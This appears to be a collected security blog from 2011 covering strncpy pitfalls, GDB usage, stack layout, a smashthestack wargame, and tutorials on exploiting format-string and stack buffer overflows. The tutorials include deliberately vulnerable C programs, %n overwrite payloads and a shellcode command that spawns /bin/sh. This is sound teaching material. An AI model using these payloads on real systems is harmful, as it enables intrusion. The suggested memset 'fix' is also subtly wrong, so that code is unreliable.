strncpy – Is it really secure?

Posted: September 22, 2011 in Stack Smashing

Though there is a lot of information already available on the same, I would like to talk a bit about this. In many experts’ view, strncpy() just trades one type of bug for another. In a sense, this is true. A short and straight-forward answer would be “No!”, but let’s look at why it is so.

  • strcpy() copies data from the source onto the destination, until a NULL character is met in the source operand. It does not check bounds of the destination onto which it is copying data. So this can be used to overflow static buffers in memory, overwriting memory locations that ideally shouldn’t be overwritten.
  • strncpy() on the other hand, handles the problem with ease. It takes a third argument as the maximum number of characters that should be copied onto the destination string. This number is generally the size of the destination buffer. But then strncpy() does not append the destination string with a NULL character. Thus, if string handling functions were to use the destination buffer, they would have to blindly hope that the byte immediately after the destination buffer is a NULL character. In most cases, this is not true.

Thus if one were to use strncpy(), they would have to hope that the byte immediately after the destination buffer onto which they copy the string is a NULL character (0x0). This is not true in most of the cases, as static variables on the stack are allocated contiguously, enabling random access of data exceeding the bounds of the buffer. A classic example of such a case is one where a vulnerable strcpy() function call is made with the source string previously copied using a (supposedly safe) strncpy() function. This strcpy() function copies data till a NULL character is met, but this NULL character was never appended to the source string when the previous strncpy() function call was made. Thus there is a potential buffer overflow vulnerability. SmashTheStack’s IO has level6 which deals with this case specifically. I’ve also written a small writeup on hints regarding the same.

Another example is a strncpy() function followed by a strncat() function, which in some cases is vulnerable to a buffer overflow. SmashTheStack’s IO has level8 which deals with this case and I’ve also written a writeup on the same.

Well, what do we do then?

All we can do is to manually append a NULL character to a string once strncpy() call is done. In order to do this, we need the size of the buffer to be one more than the actual size of the string to be stored. A secure implementation would be:

#define STRINGSIZE 5

char buf [ STRINGSIZE + 1 ];

strncpy ( buf, “abcde”, STRINGSIZE );

memset ( buf [ STRINGSIZE ], 0x0, 1 );

A bit of gyan (knowledge)

The internet is maturing at an extremely fast rate day-by-day, and the world-wide-web (www)  has become a central hub for information available worldwide. Nowadays, communication between the far ends of the world has become trivial. The dot-com boom happened in the mid-1990’s and companies have started depending hugely on the internet since then. This has paved way to a huge number of possibilities, along with risks. Companies and customers and retailers can buy and sell online and e-commerce has become substantially important because of this.

What I’ve found is that however fast technology grows, people’s minds don’t change. No matter how secure you tend to keep your transaction between the client and server, e-commerce’s growth has not increased very much because of the constant fear in people’s minds – “How can I trust this fellow when I cannot even see him? What if I pay online but don’t get my package?”. A typical example is the huge number of credit card frauds over the decades, which has just increased the fear in people’s minds.

Each time a vulnerability is discovered on a particular website, it has been exploited and has incurred huge losses for the company hosting that website. Time and again, people have tried to keep websites as secure as possible. Theoretically, algorithms (used in security) have been proven to be secure (till date) and yet, attackers have always found ways and means to breach security.

In my opinion, it is just plain ignorance of the designer to ignore the security aspects to make his work easier. Though development of technology is rapidly increasing and we learn new things everyday, secure coding practices are not learnt in the process. This in turn leads to security holes in the implementation of software, which are then exploited by attackers causing huge losses to companies.

Let’s try to answer some simple questions:

  • How do you host webpages over the world-wide-web?
    • In most cases, web pages are accessed using the http(s) or (s)ftp protocols. If a person wants to host a website over the world-wide-web, (s)he has to first register his/her domain name. This means that the domain name will get mapped to a particular IP address which is reachable from anywhere in the world (called as ‘public ip’). Next, the person has to enable the website to be accessible from the machine having the assigned IP address, which is generally done using a web server to host his/her website. Now, the website is available to anyone who either knows the public IP or the registered domain name.
  • What programming language can be used while implementing the same?
    • There are a huge number of scripting languages available, which designers can use to create websites. Examples are PHP, JSP, ASP, etc. Programming constructs differ in each language, but end up doing the same things. There is also CGI (common gateway interface) where you can use scripting languages such as Python, Perl, Ruby, etc. to do the same job.
  • What should one do to make my web application secure?
    • This question cannot be answered in one paragraph. Anyway, I’ll try listing a few:
      • Firstly, it requires a good knowledge of the exact working of the code which designers write. Talking with an example, it means that knowing that “strcpy()” function copies one string to another is not enough, but rather the programmer needs to know how exactly it copies and why it is made so.
      • Secondly, the programmer who implements the software needs to have deep knowledge about secure coding practices – what, why and how. Secure coding practices try to ensure that there are minimal security holes in software being designed, thus ensuring safety, security and stability of software. Other factors such as reliability, integrity tag along if these conditions are met.

Now, based on the three questions answered above, we can come to a standpoint as to what factors determine how secure a website is. In decreasing order of importance and difficulty:

  1. Knowledge of the programmer.
  2. Network layout being used.
  3. Configurations being used in software.

We know that the only way to access a website hosted on a public IP is through the internet. Without the internet, the world-wide-web becomes a big joke. When we look at how the internet is designed, we see that networking plays a huge role. Hence, the protocols being implemented during transfer of data have to be secure. No matter how secure the application is, if the networking protocols being implemented are insecure, security is threatened. This is one basic fact that all web designers have to understand. Most of the devices used in the internet today, use the 5 layer hybrid protocol stack. This protocol stack is known to be insecure, and is prone to MITM attacks (DNS cache poisoning, ARP spoofing, IP spoofing, etc.)

Management of a website is normally done through configuration settings. These configuration settings determine how users of the website can access data and with what level of permissions. These configuration settings for the website can be divided into two parts – configurations of web server and the configurations of the user who is accessing the website. Configurations of the web server mean those configurations which affect all users accessing the website, whereas user-specific configurations apply to single users accessing the website. An example of a web-server configuration is the “Directory Listing” option, where a user can list the contents of a directory accessible through the website, without a webpage displaying it. An example of a user-specific configuration is the access control being specified to each user, controlled by an ACL (Access Control List). Programming languages sometimes influence how these user-specific configurations are specified.

Can we make the world-wide-web ‘entirely’ secure?

A simple answer would be “Entirely secure?! I don’t think so!”. But there are a lot of factors to consider while answering this question. Let’s look at some of them.

Firstly, the programmer implementing the software has a good knowledge of secure coding practices. He/she has to know exactly how the code is being implemented and how secure it is. This is where programming languages play an important role. Some programming languages provide very high-level programming constructs to make the job easier for the programmer, but this actually blinds the programmer from the inner implementation of the constructs and how secure they are. Thus security does not only rely on how the the programmer codes, but also how the code is being implemented by the compiler/interpreter of that particular programming language. The programmer has to take care of this, carefully considering the programming language that is being used and how it is actually being implemented.

There isn’t much that can be done about the security level of the entire protocol stack. This is because if we have to modify the protocols in the protocol stack to make it secure (below the application layer), then we would have to change the firmware in every hub, switch, router and computer all around the world. For a long time, people have been changing the protocols at the application layer to secure ones (such as SSL), trying to prevent MITM attacks at the application layer. But then we have to understand that whatever is done on the application layer is specific only to that layer. The security mechanisms used in the application layer are totally blind to attacks happening at the lower layers. Thus, if we actually would have to make the network layout totally secure, that wouldn’t be possible. But what we can do is to provide more encryption mechanisms at the application layer, hoping for the best. So from the network point of view, the world-wide-web is still insecure and will continue to be until the entire protocol stack can be made secure.

In most of today’s websites, vulnerabilities arise due to insecure configurations being used. The programmer is lazy, thus leaving insecure configurations on the website, paving way for information leak and potential exploits. Though this is relatively easier to handle when compared to the other factors, it is important when it comes to security of a website.

What now?

The very need of security arises because of the fact – all of us are not responsible citizens. There would be no need for policemen if there were no thieves. But this is definitely not achievable, because changing hardware and software is a lot easier than changing people! There is a reason that I’ve said that “knowledge of the programmer” is more important and harder to achieve than “making the network layout secure”. What I mean is that it is easier to change all the hubs, switches, routers and computers all over the world to achieve security, than to strive to achieve that every programmer has to have the knowledge of secure coding practices! :-D

During my under-graduation, a professor had once said “It is a never-ending race between designers, attackers and security experts”. Designers keep developing technology, while attackers keep finding security holes in the implementation of that technology, and security experts try to come up with workarounds to patch these holes. This seems to be true, not only with computers, but with any technology used in this world!

We have to do best with what we have. We know that there are attackers prowling in the wild, looking for vulnerable websites to deface, or probably steal data from. So it is our responsibility to secure our data, no matter what. We have talked about some of the factors influencing security, so we will have to look deeper into the same and try to come up with an effective, yet secure implementation.

Let’s discuss a few ways of effectively using GDB while debugging programs. Though DDD aims at providing a reasonable UI for GDB, it still uses the command line interface of GDB for it’s work. So let’s see what options are available in GDB. There are a lot of tutorials which can be found online regarding the same, but I wish to keep this a bit naive for beginners.

This is just a note on my experiences with gdb. You can look at tutorials from betterexplained.com and RMS for more features.

  • What are the prerequisites to be done before starting to debug the program using gdb?
    • Firstly, you have to compile the program with the ‘-g’ option to provide debugging symbols for gdb. This can be done by:
      • user@host:~$ gcc program.c -o program_executable -g
    • Next, you have to invoke the executable using ‘gdb’. In my Ubuntu system, I normally do by:
      • user@host:~$ gdb program_executable
  • How do I set breakpoints in the program?
    • In case of setting breakpoints in source code:
      • (gdb) break program.c:29    (set breakpoint at line number 29 of source file program.c)
      • (gdb) b program.c:29
      • (gdb) b 29 (This case is when there is only one C file compiled)
    • In case of setting breakpoints at specific addresses:
      • (gdb) break *0x8048255
      • (gdb) b *0x8048255
  • How do I disassemble only particular addresses within a program using gdb?
    • In case of disassembly of a function using it’s name:
      • (gdb) disas <name>
    • In case of disassembly using addresses:
      • (gdb) info line <name_of_function> (optional)
      • (gdb) disas <start_addr> <end_addr>
  • How do I print the value of a register?
    • To see values in all registers:
      • info registers
    • To see value in individual registers:
      • print (or) x/bwx <register> (register=$eax/$ebx/$ecx/$edx/$esp/$ebp/$eip/$edi/$esi)
  • In what ways can I view the value of memory address/variable?
    • HEX:
      • x/x <var>           (only 1 byte)
      • x/2x <var>         (2 bytes)
      • x/2bwx <var>   (2 words)
    • As string:
      • x/s <var>
    • As character:
      • x/c <var>
  • How do dump the stack?
    • Get 32 words from stack:
      • x/32bwx $esp
  • How can I disassemble a particular instruction at a particular address?
    • At any address:
      • x/i <address>
    • The next instruction:
      • x/i $esp
  • How do I step into functions?
    • Step by source lines:
      • step (OR) s
    • Step by instructions:
      • stepi (OR) si
  • How do I step over functions?
    • Step over source lines:
      • next (OR) n
    • Step over instructions:
      • nexti (OR) ni
  • How do I continue till I meet another breakpoint?
    • continue (OR) c
  • How do I perform multiple operations with one command?
    • (gdb) define function1
    • > stepi
    • > echo “ebp = “
    • > x/bwx $esp
    • > end
    • (gdb) function1
    • esp = 0xbfffd89c
    • (gdb)

There are a lot more advanced features that can be used, I’ll keep adding new stuff as and when I encounter them. :-)

For understanding this vulnerability, you first have a thorough understanding of the stack layout.

  • What is a format string?

From my understanding (quite naive), a format string is a string which determines the format of the rest of the arguments passed to a function. In the case of C language, functions such as printf(), scanf(), fprintf(), vsprintf() take format strings as argument.

Example: printf(“%d”,i);      => Here, ‘%d’ is a format string which determines the format of ‘i’ (in this case – integer).

  • What is a format string vulnerability?

A format string vulnerability is where an unsanitized input is passed to a function which is capable of taking a format string as argument. From a programmer’s perspective, this unsanitized string is assumed to be a normal string, but if given as a format string, can lead to examining values of the stack and much more.

  • What can be done by exploiting one?

By exploiting such a vulnerability, an attacker can dump the entire program’s stack, write into arbitrary memory locations and even execute custom written machine code.

Let’s take an example and proceed:

#include <stdio.h>

#include <string.h>

int main ( int argc, char **argv ) {

char buffer[1024];

if ( argc >= 2 ) {

strncpy ( buffer, argv[1], strlen(argv[1]) > 1024 ? 1024 : strlen(argv[1]) );

printf ( buffer );

}

return 0;

}

This program should ideally print the first command line argument (maximum length 1024) given to the program. One question we have to ask ourselves is:

  • Since the input given to the printf() function is unsanitized, what if we give a format string as argument?

Let’s analyze this a bit more. Let’s consider:

printf ( “%d”, i );

Here, you can see that there are two arguments to be passed to the printf function. Now, when printf takes the first argument and parses it, it sees “%d”. There, it knows that there is a second argument which must’ve been provided and that’s an integer i. So it takes the next argument (next 4 bytes below 1st argument) from the stack (which it assumes the calling function must’ve pushed) and prints it.

Let’s take the case:

printf ( buffer );        // Here, ‘buffer’ contains “%d”.

It’s clear from this that if ‘%d’ is present in buffer, printf tries to take the next argument from stack. Now, there isn’t any argument that would’ve been pushed by the calling function, and yet printf assumes that an argument should’ve been pushed and takes the next word from stack as the integer and prints it. Now, the value which is printed is some random value (mostly a local variable of the calling function). So, since we have the freedom to enter whatever format string we want in ‘buffer’, we have to ability to print the local variables of the calling function, and much more.

Let’s also learn about some possibilities in format strings:

  • “%p” – prints the value of the pointer provided as argument (essentially a 4 byte hex dump).
  • “%n” – stores the number of bytes written till now, in the pointer provided as argument.
  • “%Nd” – prints the integer provided as argument prefixed by ‘N’ empty spaces.

So given all this and a vulnerable printf() function:

  • We can dump the values of the stack by appropriate number of %p’s.
  • We can write the number of bytes written till now into an address provided as argument using ‘%n’.
  • We can use ‘%Nd’ to control the value written into the pointer.

Coming back to our example, we know that the argument passed to printf is the starting address of the character array ‘buffer’. The memory layout is:

Stack Layout of Format String

Stack Layout of Format String

Now, let’s see what we can put in ‘buffer':

  • If ‘buffer’ = “abcd”, nothing new will happen and the function will just print ‘abcd’.
  • If ‘buffer’ = “%p”, then printf will see the next 4 bytes (part of buffer  itself) from the stack as the argument and print the value.
  • If ‘buffer’ = “%nAB”, then printf will consider the next argument (first 4 bytes of ‘buffer’) as a pointer to a variable and write the number of bytes printed till now (that’s zero), into the address pointed to by these 4 bytes. Essentially, it should give segmentation fault (SIGSEGV) as the value of the address to be written is “0x4241673e” (hex of ‘BAn%’ in little-endian) and that address is not accessible by this process.
  • If ‘buffer’ = “\x9c\xd8\xff\xbf%n”, then printf will consider the next argument as a pointer and try to write 4 into it (since \x9c\xd8\xff\xbf is 4 bytes). The next argument itself is 0xbfffd89c, which we assume in this case to be the address where the return address of printf is stored. If not, we try to debug the program, get the pointer to the return address of printf appropriately store that value. Hence, the program will again give a segmentation fault since after printf executes, it’s return address is 0x00000004 (overwritten by printf itself), and tries to execute instructions at that address, resulting in SIGSEGV.
  • If ‘buffer’ =
    • “\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%10u%n%10u%n%10u%n%10u%n”

In this case, assuming that the return address is 4 btyes from 0xbfffd89c to 0xbfffd89f, printf will write 26 into the first byte of return address, 37 into the second byte, 48 into the third byte and 59 into the fourth byte. Thus the return address of printf this time is overwritten as 0x3b30251a. It’ll still result in a segmentation fault, but atleast we now know that we can write any arbitrary value into the return address of printf.

  • If we place some shellcode in the buffer after our format string and we know the starting address of the format string, then we can successfully execute our own code. Let’s assume that the format string starts at address 0xbfffd8a4. Now, the format string will end at 0xbfffd8a4 + 40 = 0xbfffd8cc and this is where our shellcode starts. Hence, we need to write this address 0xbfffd8cc as the return address of printf.
    • buffer =“\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%175u%n%64u%n%217u%n%204u%n”+
    • “<shellcode>”

The above code will write the value ofbfffd8a4 into the return address of printf. 16 bytes were already written for the return address, so 175+16 = 191 (decimal of bf) will be written on the first byte of the return address. Subsequently, 191+64 = 255 (decimal of ‘ff’) will be written on the second byte of return address, and so on

Hence, with the above exploit, we’ll be able to execute any code we want using the format string.

How do we make our code secure?

Simple, don’t allow the user to be able to pass a format string to the function. A simple solution would be to write the format string yourself, and expect just the data from the user.

printf ( buffer );              —> INSECURE

printf ( “%s”, buffer );  —-> SECURE

Stack Memory Layout

Posted: September 18, 2011 in Background Information

Let’s first understand the memory layout in the stack of a program during execution. When a program loads into memory, an address space is allocated for the program in the stack. One point to note is that all these addresses are virtual addresses we’re talking about, not physical addresses. Then, the stub code is called, which loads the program into memory and does various administration stuff. Next, when the starting function is called, which is normally present in the .text section of an ELF header. The interesting part comes only when the actual program starts (that’s the main() function).

Each function when called, sets up it’s own stack frame on the stack, executes, and upon finishing, gives back the control to the calling function. There are three registers we have to understand properly in order to proceed:

  • EBP register: This register contains an address, which is the base address of the stack frame of the current function in execution. We call this the “base pointer”, as this signifies that this address is the base and all the memory which the executing function uses on the stack starts from here.
  • EIP register: This register holds the address of the next instruction to be executed and thus is called the “instruction pointer”.
  • ESP register: This register contains an address, which signifies the TOS (top-of-stack) of the executing function. Thus the value of “ESP-EBP” gives the size of the stack of a function.

Now, let’s move onto how the stack frames are set up by a function when it loads. Let’s take an example where a function “A” calls another function “B”. Now, ‘A’ has to issue a “call” instruction to the starting address of function ‘B’.

A common question:

What’s the difference between a “call” instruction and a “jmp” instruction? Why cant the calling function just say “jmp <addr>” instead of “call <addr>”?

The answer to this is quite simple. When function ‘A’ calls function ‘B’ and ‘B’ finishes executing, it must return back to the address of the instruction in ‘A’ and continue execution. Now, how does ‘B’ know the address that must be put onto EIP register so that ‘A’ can resume execution? This is done by the “call” and “ret” instructions.

Let’s say ‘A’ has the following instructions:

0x8048350 call 0x8048360 <function ‘B’>

0x8048355 test eax, eax

And ‘B’ has the following instructions:

0x8048360 mov eax, 0x01

0x8048362 ret

When “call <addr>” is executed by ‘A’, the address from which execution must resume (in this case 0x8048355) is pushed onto the stack. Then ‘B’ starts executing, and after it finishes executing, the “ret” instruction pops the value from TOS onto EIP, which in turn is the address of the next instruction to be executed. We call this address the return address. Now, “jmp 0x8048360″ will not push the return address on the stack, and hence the system will never be able to know which instruction it has to resume execution from. Thus, we always call functions using the “call” instruction.

Before function ‘A’ calls function ‘B’, it must somehow make the arguments available for ‘B’. This is done by pushing the arguments onto the stack before the “call” instruction is made. The arguments are pushed in reverse order, since ‘B’ must be able to see argument 1 on TOS, argument 2 just below that, etc. Therefore, before ‘A’ calls ‘B’ (say 2 arguments), the following will take place:

push <argument 2>

push <argument 1>

call <B_addr>

The stack layout just as ‘B’ starts execution will be:

Stack Layout when function 'A' calls function 'B'

Stack Layout when function 'A' calls function 'B'

When function ‘A’ calls function ‘B’, the return address (from where execution has to be resumed) is pushed onto the stack, and ‘B’ starts executing. Now, ‘B’ also has to have it’s own stack frame. So the first 2 instructions of any function are:

push ebp

mov ebp, esp

These two instructions set up the stack for the called function ‘B’. The previous base pointer of function ‘A’ is saved, by pushing it onto the stack. It then sets the value of the base pointer as TOS, representing this as the bottom-of-stack for function ‘B’. All local variables come on top of the base pointer of any function.

Now, when the called function ‘B’ exits, it has to restore the previous value of the base pointer in register EBP (base pointer of calling function ‘A’). This is done by popping the value of TOS to the EBP register after execution of ‘B’ is finished. Hence, an instruction which you’ll see in every function just before it returns is:

pop ebp

NOTE: The value of addresses used in the stack decreases as the size of the stack increases. A common phrase is that the program stack grows downwards, but what it actually means is that the ‘value’ of each subsequent address in the stack keeps decreasing as the stack grows.

One of the main objectives of writing this tutorial is to show people that exploiting a buffer overflow vulnerability is NO BIG DEAL. We’re dealing with a linux OS here, so take into considerations that some parts of the explanation will be linux specific. Now, to the point.

  • What is a buffer overflow vulnerability?

A buffer overflow vulnerability is one where a program disregards bounds checking while copying data onto a buffer present in memory. This allows data to overflow the buffer and be copied into random addresses, thus allowing a user to write arbitrary data into memory locations which ideally should not be overwritten.

  • What can be done by exploiting one?

In most cases, the user can execute arbitrary code on the host system. This highly depends on the user executing the program. If it’s root user, then voila – ANYTHING is possible! :-D

  • Is there any background knowledge needed for exploitation?

A good understanding of the memory layout during program execution along with a bit of patience and self motivation is necessary to exploit one.

Now, assuming that you’ve understood the basics of stack memory layout from the background info section, let’s move onto looking at a simple buffer overflow exploit.

Exploiting a buffer overflow

Let’s consider a sample program:

#include <stdio.h>

#include <string.h>

void print_argument ( char **argv ) {

/* This function is vulnerable to a buffer overflow attack */

char buffer[50];

strcpy ( buffer, argv[1] );

printf ( “Argument : %s\n”, buffer );

return;

}

int main ( int argc, char **argv ) {

if ( argc >= 2 ) {

print_argument ( argv );

}

return 0;

}

The above program prints the first command line argument provided to the program. Let’s examine why this program is vulnerable to a buffer overflow attack. A critical question that should be answered is:

  • What if we provide a command line argument whose length is greater than 50?

We know that the variable buffer of size 50 bytes is allocated on the stack. Below that lies the base pointer, and below that lies the return address of the main() function. The outline of stack layout is given below:

Stack Layout

Stack Layout

Now, if we provide more than 50 bytes as command line argument, strcpy() function tried to copy all the values of argv[1] onto buffer, thus overflowing the buffer and overwriting the values of the saved base pointer and the return address. In a x86 32 bit system, the word size is 4 bytes. Hence, if we provide 58 bytes, we’ll successfully overwrite the value of return address and base pointer.

When strcpy() finishes, it’ll try to pop out the base pointer (some random value overwritten) and store the return address in EIP. This return address is also overwritten by us, and hence we have control of where the processor must start executing the next instruction. Now, if we store some shell code (or machine code, which I’ll explain later) in the buffer, and overwrite the return address as the starting address of buffer, then the processor will start executing from the buffer as if it were instructions. VOILA, we can execute whatever we want! :-D

Now, let’s write an exploit to give us a shell when we execute this program. Don’t worry if you don’t understand the exploit, there’s a lot to be learnt about shell codes and how they work before you can actually go to write an exploit. In this case, let’s assume that the address where the variable ‘buffer’ starts is 0xbfffd89c.

$ gcc printargs.c -o printargs

$ ./printargs `python -c ‘print “\x90″*10+”\x6a\x31\x66\x58\xcd\x80\x66\x89″ + \xc3\x66\x89\xc1\x6a\x46\x66\x58″ + “\xcd\x80\x31\xc9\xf7\xe1\x51\x68″ + “\x2f\x2f\x73\x68\x68\x2f\x62\x69″ + “\x6e\x89\xe3\xb0\x0b\xcd\x80″ + “\x41″*5+”\x9c\xd8\xff\xbf”‘`

sh:~$

That’s it, you’ve got a shell! :-) It’s as simple as that folks, nothing more to it! :-D

I was introduced to smashthestack.org by Zubin, my partner in crime. :-P I looked at io.smashthestack.org. At first I didn’t like it much, but then later on, it got really addictive! It has challenges starting from the testing the basics of C, moving on to buffer overflows, format string vulnerability, etc. I am currently on level11, and I’m thinking of post some hints on how to solve the problems.

The way the entire challenge is organized is really cool – simple, yet cool. There’s a remote linux box, onto which we have access over ssh protocol on port 2224. The password for level1 is “level1″. Password for each level is stored in the file /home/level<num>/.pass. So we need to be the user “level<num>” in the first place to access that level’s password! At first, it doesn’t look simple, but if we see the way the challenges are configured in the linux box, it becomes easy.

$ ssh -p 2224 level1@io.smashthestack.org
level1@io.smashthestack.org’s password:
level1@io:~$ cd /levels

level1@io:/levels$ ls -l level01
-r-sr-x— 1 level2 level1 7500 Nov 16  2007 level01
level1@io:/levels$

Here, we can see that the executable level01 is executable only by user ‘level1′ but owned by user ‘level2′. Hence, while executing the challenge’s executable, if we’re able to get back a shell (with setuid privileges), then are ‘level2′ in that shell! Hence, from that new shell, we can read the next level’s password and voila, we can access the next level’s executable.

This is how it basically works, and some of the challenges themselves are coded in such a way that if you’re able to do the right stuff, it gives you back a shell. It’s really interesting and addictive, so readers, if you get time and you’re interested in reverse engineering/binary analysis, this is definitely the way. :-)